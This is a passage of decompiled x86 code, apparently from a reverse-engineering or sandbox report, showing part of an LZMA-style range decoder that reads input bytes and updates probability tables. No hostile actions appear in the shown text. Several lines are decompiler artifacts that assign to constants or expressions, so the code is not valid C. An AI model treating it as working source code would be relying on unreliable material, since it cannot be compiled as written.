                                                                                      														goto L15;
                                                                                      													} else {
                                                                                      														goto L11;
                                                                                      													}
                                                                                      													do {
                                                                                      														L11:
                                                                                      														_t612 = _t612 - 1;
                                                                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      													} while (_t612 != 0);
                                                                                      													goto L12;
                                                                                      												}
                                                                                      												if( *(_t613 - 4) != 0) {
                                                                                      													GlobalFree( *(_t613 - 4));
                                                                                      												}
                                                                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      												 *(_t613 - 4) = _t534;
                                                                                      												if(_t534 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      													goto L10;
                                                                                      												}
                                                                                      											case 1:
                                                                                      												L13:
                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													 *(_t613 - 0x88) = 1;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      												_t45 = _t613 - 0x48;
                                                                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      												__eflags =  *_t45;
                                                                                      												L15:
                                                                                      												if( *(_t613 - 0x48) < 4) {
                                                                                      													goto L13;
                                                                                      												}
                                                                                      												_t546 =  *(_t613 - 0x40);
                                                                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                      													L20:
                                                                                      													 *(_t613 - 0x48) = 5;
                                                                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      													goto L23;
                                                                                      												}
                                                                                      												 *(_t613 - 0x74) = _t546;
                                                                                      												if( *(_t613 - 8) != 0) {
                                                                                      													GlobalFree( *(_t613 - 8));
                                                                                      												}
                                                                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      												 *(_t613 - 8) = _t534;
                                                                                      												if(_t534 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													goto L20;
                                                                                      												}
                                                                                      											case 2:
                                                                                      												L24:
                                                                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      												 *(_t613 - 0x84) = 6;
                                                                                      												 *(_t613 - 0x4c) = _t553;
                                                                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                      												L132:
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											case 3:
                                                                                      												L21:
                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													 *(_t613 - 0x88) = 3;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												_t67 = _t613 - 0x70;
                                                                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      												__eflags =  *_t67;
                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      												L23:
                                                                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      												if( *(_t613 - 0x48) != 0) {
                                                                                      													goto L21;
                                                                                      												}
                                                                                      												goto L24;
                                                                                      											case 4:
                                                                                      												L133:
                                                                                      												_t531 =  *_t606;
                                                                                      												_t589 = _t531 & 0x0000ffff;
                                                                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      												if( *(_t613 - 0xc) >= _t565) {
                                                                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      													 *(_t613 - 0x40) = 1;
                                                                                      													_t532 = _t531 - (_t531 >> 5);
                                                                                      													 *_t606 = _t532;
                                                                                      												} else {
                                                                                      													 *(_t613 - 0x10) = _t565;
                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      												}
                                                                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      													goto L139;
                                                                                      												}
                                                                                      											case 5:
                                                                                      												goto L137;
                                                                                      											case 6:
                                                                                      												__edx = 0;
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                      												__cl = 8;
                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                      														_t98 = __ebp - 0x38;
                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      														__eflags =  *_t98;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      													}
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													goto L61;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 8);
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													goto L41;
                                                                                      												}
                                                                                      											case 7:
                                                                                      												__eflags =  *(__ebp - 0x40) - 1;
                                                                                      												if( *(__ebp - 0x40) != 1) {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      													 *(__ebp - 0x80) = 0x16;
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x28);
                                                                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      													__eax = 0;
                                                                                      													__eflags =  *(__ebp - 0x38) - 7;
                                                                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      													__al = __al & 0x000000fd;
                                                                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x664;
                                                                                      													__eflags = __eax;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													goto L69;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 8;
                                                                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 8:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                      													__ecx =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      												}
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 9:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													goto L89;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      												__eflags = _t259;
                                                                                      												0 | _t259 = _t259 + _t259 + 9;
                                                                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      												goto L76;
                                                                                      											case 0xa:
                                                                                      												goto L0;
                                                                                      											case 0xb:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												goto L88;
                                                                                      											case 0xc:
                                                                                      												L99:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t334 = __ebp - 0x70;
                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t334;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												goto L101;
                                                                                      											case 0xd:
                                                                                      												L37:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t122 = __ebp - 0x70;
                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t122;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L39:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      													goto L48;
                                                                                      												}
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													goto L54;
                                                                                      												}
                                                                                      												L41:
                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                      												__eax = __eax + 1;
                                                                                      												__eax = __eax << 8;
                                                                                      												__eax = __eax + __ebx;
                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edx;
                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L39;
                                                                                      												} else {
                                                                                      													goto L37;
                                                                                      												}
                                                                                      											case 0xe:
                                                                                      												L46:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t156 = __ebp - 0x70;
                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t156;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												while(1) {
                                                                                      													L48:
                                                                                      													__eflags = __ebx - 0x100;
                                                                                      													if(__ebx >= 0x100) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__edx = __ebx + __ebx;
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													__esi = __edx + __eax;
                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__ax =  *__esi;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      														__cx = __ax;
                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                      														__ebx = _t170;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *__esi = __ax;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                      														0x800 = 0x800 - __edi;
                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      														__ebx = __ebx + __ebx;
                                                                                      														 *__esi = __cx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														goto L46;
                                                                                      													}
                                                                                      												}
                                                                                      												L54:
                                                                                      												_t173 = __ebp - 0x34;
                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      												__eflags =  *_t173;
                                                                                      												goto L55;
                                                                                      											case 0xf:
                                                                                      												L58:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t203 = __ebp - 0x70;
                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t203;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L60:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													L55:
                                                                                      													__al =  *(__ebp - 0x44);
                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												L61:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                      													__ebx = _t217;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L60;
                                                                                      												} else {
                                                                                      													goto L58;
                                                                                      												}
                                                                                      											case 0x10:
                                                                                      												L109:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t365 = __ebp - 0x70;
                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t365;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												goto L111;
                                                                                      											case 0x11:
                                                                                      												goto L69;
                                                                                      											case 0x12:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												__eflags = __eax;
                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      												goto L130;
                                                                                      											case 0x13:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													_t469 = __ebp - 0x58;
                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      													__eflags =  *_t469;
                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                      													L144:
                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                      													goto L145;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      												L130:
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                      												goto L144;
                                                                                      											case 0x14:
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                      												 *(_t613 - 0x88) = _t533;
                                                                                      												goto L1;
                                                                                      											case 0x15:
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      												goto L120;
                                                                                      											case 0x16:
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												__eflags = __eax - 4;
                                                                                      												if(__eax >= 4) {
                                                                                      													_push(3);
                                                                                      													_pop(__eax);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                      												__eax = __eax << 7;
                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L145;
                                                                                      											case 0x17:
                                                                                      												L145:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      												goto L149;
                                                                                      											case 0x18:
                                                                                      												L146:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t484 = __ebp - 0x70;
                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t484;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L148:
                                                                                      												_t487 = __ebp - 0x48;
                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      												__eflags =  *_t487;
                                                                                      												L149:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                      													0 = 1;
                                                                                      													__eax = 1 << __cl;
                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													while(1) {
                                                                                      														 *(_t613 - 0x88) = _t533;
                                                                                      														goto L1;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__esi = __edx + __eax;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__ax =  *__esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
